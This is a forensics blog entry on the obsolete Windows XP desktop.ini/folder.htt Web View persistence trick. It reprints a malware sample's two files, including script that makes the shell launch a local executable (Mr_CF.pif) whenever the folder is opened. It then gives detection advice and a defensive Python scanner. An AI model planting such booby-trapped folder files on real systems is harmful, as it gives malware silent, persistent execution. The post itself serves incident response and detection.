Beyond good ol’ Run key, Part 49
November 5, 2016 in Autostart (Persistence), Compromise Detection, Forensic Analysis, Incident Response, Malware Analysis
I was reviewing the logs of my sandbox and came across a very old malware that was using an old-school trick as a way to increase its chances of survival – it used the desktop.ini / folder.htt combo that comes into play when the Web View is chosen for folders (XP or earlier). I know, I know... it’s archaeology... but I checked my old posts in this series and realized I have not covered it yet, so I am fixing it now...
An example Desktop.ini created by the malware looks like this:
[.ShellClassInfo]
ConfirmFileOp=0
[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
PersistMoniker=file://Folder.htt
[ExtShellFolderViews]
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}
and the associated folder.htt like this:
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=Windows-1252">
</head>
<body style="margin: 0" scroll=no>
<object id=FileList border=0 tabindex=1 classid="clsid:1820FED0-473E-11D0-A96C-00C04FD705A2" style="width: 100; height: 100" tabIndex=-1>
</object>
</body>
</html>
<script>
objectstr="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
objectstr+="CODEBASE=\"Mr_CF.pif#version=1,1,1,1\">"
objectstr+="<PARAM NAME=\"_Version\" VALUE=\"65536\">"
objectstr+="</OBJECT>"
objectstr+="<HTML><H1></H1></HTML>";
document.writeln(objectstr);
document.close();
</script>
There is not much more I can write here... this is super old-school and I am just adding it for completeness. The detection angle is simple: a desktop.ini that wires the Web View CLSID to a PersistMoniker (the folder.htt in the same directory), and a folder.htt whose OBJECT tag names a local executable in its CODEBASE, is something the shell would silently run as soon as the folder is browsed.
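As an added example (not code from the original post), here is a small triage script for this artifact: it walks a directory tree such as a mounted copy of an old XP volume, finds every desktop.ini that points the Web View shell extension at a custom template via PersistMoniker, and pulls the CODEBASE targets out of that folder.htt, including the JavaScript-escaped `CODEBASE=\"...\"` form seen in the sample above. The folder names and the sample file content it builds in a temporary directory are constructed for the demo, based on the two files quoted in the post.

```python
"""Triage helper for the desktop.ini / folder.htt Web View persistence trick.

Example code written for this post, not part of it. Walks a directory tree,
finds desktop.ini files that point the shell's Web View at a custom template,
and lists any <OBJECT ... CODEBASE="..."> targets inside that template so an
analyst can see which binary the folder would launch when browsed.
"""
import os
import re
import tempfile

# CLSID of the Web View shell extension referenced in the post's desktop.ini
WEBVIEW_CLSID = "{5984FFE0-28D4-11CF-AE66-08002B2E1262}"
# Extensions the shell would execute if named in a CODEBASE attribute
EXEC_EXTS = {".pif", ".exe", ".com", ".scr", ".bat", ".cmd", ".hta", ".vbs", ".js", ".dll"}
# Matches CODEBASE="x" as well as the JS-escaped CODEBASE=\"x\" form in the sample
CODEBASE_RE = re.compile(r'CODEBASE\s*=\s*\\?"([^"\\]+)\\?"', re.IGNORECASE)


def parse_desktop_ini(text):
    """Minimal INI parser: {section: {key: value}}, keeping key case (CLSIDs are keys)."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip()] = value.strip()
    return sections


def webview_template(ini):
    """Return the PersistMoniker file name if the INI wires a custom Web View template."""
    moniker = ini.get(WEBVIEW_CLSID, {}).get("PersistMoniker")
    if not moniker:
        return None
    return re.sub(r"^file://", "", moniker, flags=re.IGNORECASE)  # relative to the folder


def find_codebase_refs(html):
    """All CODEBASE targets named in the template, escaped or not."""
    return CODEBASE_RE.findall(html)


def executables_from_refs(refs):
    """Strip the '#version=...' suffix and keep refs with an executable extension."""
    names = [ref.split("#", 1)[0] for ref in refs]
    return [n for n in names if os.path.splitext(n)[1].lower() in EXEC_EXTS]


def _find_ci(folder, wanted):
    """Case-insensitive file lookup (FAT/NTFS names are case-insensitive)."""
    for name in os.listdir(folder):
        if name.lower() == wanted.lower():
            return os.path.join(folder, name)
    return None


def scan_tree(root):
    """Report folders whose desktop.ini points at a Web View template, with its CODEBASE refs."""
    findings = []
    for folder, _dirs, _files in os.walk(root):
        ini_path = _find_ci(folder, "desktop.ini")
        if ini_path is None:
            continue
        with open(ini_path, encoding="latin-1") as fh:
            template = webview_template(parse_desktop_ini(fh.read()))
        if template is None:
            continue  # ordinary desktop.ini (icon, localized name, ...)
        htt_path, refs = _find_ci(folder, template), []
        if htt_path is not None:
            with open(htt_path, encoding="latin-1") as fh:
                refs = find_codebase_refs(fh.read())
        findings.append({"folder": folder, "template": template,
                         "template_present": htt_path is not None,
                         "codebase": refs, "executables": executables_from_refs(refs)})
    return findings


# Constructed sample files mirroring the desktop.ini / folder.htt quoted in the post
SAMPLE_INI = ("[.ShellClassInfo]\nConfirmFileOp=0\n[" + WEBVIEW_CLSID + "]\n"
              "PersistMoniker=file://Folder.htt\n[ExtShellFolderViews]\n"
              + WEBVIEW_CLSID + "=" + WEBVIEW_CLSID + "\n")
SAMPLE_HTT = ('<html><body><object id=FileList classid="clsid:1820FED0-473E-11D0-A96C-00C04FD705A2">'
              '</object></body></html><script>objectstr="<OBJECT ID=\\"RUNIT\\" WIDTH=0 HEIGHT=0 '
              'TYPE=\\"application/x-oleobject\\"";objectstr+="CODEBASE=\\"Mr_CF.pif#version=1,1,1,1\\">";'
              'document.writeln(objectstr);</script>')


def build_sample(root):
    """Create one booby-trapped folder and one benign (icon-only) folder under root."""
    bad, good = os.path.join(root, "Infected"), os.path.join(root, "Pictures")
    os.makedirs(bad, exist_ok=True)
    os.makedirs(good, exist_ok=True)
    with open(os.path.join(bad, "desktop.ini"), "w", encoding="latin-1") as fh:
        fh.write(SAMPLE_INI)
    with open(os.path.join(bad, "Folder.htt"), "w", encoding="latin-1") as fh:
        fh.write(SAMPLE_HTT)
    with open(os.path.join(good, "desktop.ini"), "w", encoding="latin-1") as fh:
        fh.write("[.ShellClassInfo]\nIconFile=%SystemRoot%\\system32\\shell32.dll\nIconIndex=3\n")
    return root


def demo():
    """Build the sample tree in a temp dir and return the scan findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_tree(build_sample(tmp))


if __name__ == "__main__":
    for hit in demo():
        print(hit["folder"], "->", hit["template"], hit["executables"])
```

Only the folder whose desktop.ini carries the Web View CLSID section is reported; the benign icon-only desktop.ini is skipped, which keeps the output usable on a real volume where nearly every folder has one.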